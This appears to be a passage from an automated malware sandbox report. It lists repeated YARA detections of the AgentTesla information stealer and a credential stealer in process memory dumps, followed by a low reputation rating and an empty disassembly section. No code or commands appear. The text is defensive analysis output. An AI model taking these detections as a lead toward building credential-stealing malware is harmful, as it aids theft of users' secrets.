                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.486980862.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.698717283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000002.698717283.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.487669907.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.487669907.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.485892465.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.485892465.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.486525104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000003.00000000.486525104.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.705211244.0000000002A91000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Disassembly

                                              No disassembly